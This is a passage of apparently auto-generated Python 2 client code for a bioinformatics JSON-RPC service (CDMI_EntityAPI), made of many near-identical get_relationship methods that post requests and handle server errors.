else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_DerivedFromGenome(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_DerivedFromGenome',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasAliasAssertedFrom(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasAliasAssertedFrom',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_AssertsAliasFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_AssertsAliasFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasCompoundAliasFrom(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasCompoundAliasFrom',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_UsesAliasForCompound(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_UsesAliasForCompound',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasEffector(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasEffector',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsEffectorFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsEffectorFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasExperimentalUnit(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasExperimentalUnit',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsExperimentalUnitOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsExperimentalUnitOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasExpressionSample(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasExpressionSample',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SampleBelongsToExperimentalUnit(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SampleBelongsToExperimentalUnit',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasGenomes(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasGenomes',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsInRegulogCollection(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsInRegulogCollection',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasIndicatedSignalFrom(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasIndicatedSignalFrom',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IndicatesSignalFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IndicatesSignalFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasKnockoutIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasKnockoutIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_KnockedOutIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_KnockedOutIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasMeasurement(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasMeasurement',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsMeasureOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsMeasureOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasMember(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasMember',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsMemberOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsMemberOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasParameter(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasParameter',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_OfEnvironment(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_OfEnvironment',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasParticipant(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasParticipant',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_ParticipatesIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ParticipatesIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasPresenceOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasPresenceOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsPresentIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsPresentIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasProteinMember(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasProteinMember',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsProteinMemberOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsProteinMemberOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasReactionAliasFrom(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasReactionAliasFrom',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_UsesAliasForReaction(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_UsesAliasForReaction',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasRegulogs(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasRegulogs',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsInCollection(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsInCollection',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
